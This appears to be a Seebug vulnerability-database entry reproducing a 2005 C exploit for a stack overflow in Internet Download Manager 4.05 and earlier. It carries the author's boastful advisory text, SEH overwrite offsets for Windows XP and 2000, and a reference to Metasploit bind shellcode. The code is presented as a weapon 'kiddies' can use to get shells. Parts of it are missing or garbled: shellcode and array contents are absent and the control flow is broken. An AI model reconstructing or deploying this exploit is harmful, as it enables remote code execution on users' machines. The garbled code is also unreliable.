Internet Download Manager <= 4.05 Input URL Stack Overflow Exploit

ID SSV:14259
Type seebug
Reporter Root
Modified 2005-07-06T00:00:00


No description provided by source.


  Title : Internet Download Manager  =< 4.05 universal remote overflow Exploit
  bug analyse and exploit code by : c0d3r "Kaveh Razavi"
  my advisory :
  this bug is differnt from what was found in application called altnet
  download manager .
  if you read the code carefully you see that I left thingz for you .
  well if you want to creat an html file linked to evil download offer
  needed thingz are there , but in IE they are not usable cause exploit
  string is bigger that IE input buffer .
  I was analysing this bug and I was thinking about how to code an exploit
  for this issue , then new Mozilla exploit came up ! yea the idea of saving
  the exploit string into a file then copy/paste it to download manager 
  inpute url . there are other ways for sure . kiddies still can have fun
  with this code just as I mentioned with a bit scripting in java or other 
  shits you can link exploit string which will be created in file exploit.txt
  you can have a bad file , anyone using download manager can give a shell !
  hint! : any other folder is being counted , so my suggestion is linking to 
  root webfolder .
  sample usage shown in a 1 minute movie which can be downloaded at :

  Exploit method : Structured Exception Handling known as SEH .
  Targets : should work on all win2000 and win xp's even sp2 ,
  Tested : winxp sp 1 and win2000 server sp 4
  compile : ms visual c++ 6 : cl dlm.c

  Greetingz :      LorD and NT , LorD always makes me happy with those  Nasa , berkely , stanford ,... shells :>   yeah me and jamie are just started , u r0x jamie ,   fewer words better ones , great !     nice work is being done here ! class I used ur offsets :)        my home ,nth here right now but those nice Essence words.
  other Folks and friends not mentioned here .


#include <stdio.h>
#include <string.h>
#include <windows.h>
#define exploit "exploit.txt"
#define NOP 0x90
#define size 2519
  int main(int argc,char **argv)

char crap1[]=  
char crap2[]= "\x22\x3E";
char crap3[]=
  char crap4[]= "\x31\x31\x2E";

// metasploit shellc0de wow!!! LPORT=4444 Size=399  
     unsigned char shellcode[] =
    FILE *fp;  
    char buffer[size];
    unsigned int os;
    char ppr[5];
    char jmp[] = "\xEB\x0C\x90\x90";
    char winxp[] = "\xB1\x2C\xC2\x77"; 
    char win2000[] ="\x08\xB0\x01\x78";
    if(argc < 2) {
    printf("\n-------- Download Manager remote exploit\n");
    printf("-------- copyrighted by c0d3r of IHS 2005\n");
    printf("-------- usage : dlm.exe target\n");
    printf("-------- target 1 : windows xp all service packs all languages : 0\n");
    printf("-------- target 2 : windows 2000 all service packs all languages : 1\n");
    printf("-------- eg : dlm.exe 0\n");	
    printf("-------- out file will be exploit.txt for windows xp\n\n");
    exit(-1) ;
    os = (unsigned short)atoi(argv[1]); 	 
    case 0:
    case 1:
    printf("\n[-] this target doesnt exist in the list\n\n");
   printf("\n-------- Download Manager remote exploit\n");
   printf("-------- copyrighted by c0d3r of IHS 2005\n");
    // heart of exploit
    printf("-------- building overflow string\n");
	buffer[size] = 0;
    buffer[size] = 0;
    // EO heart of exploit  
	printf("-------- Done !\n");
    printf("-------- Creating the exploit.txt file\n");
    fp = fopen(exploit, "w+");
    fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);
    printf("-------- Done ! enjoy it !\n");
    return 0;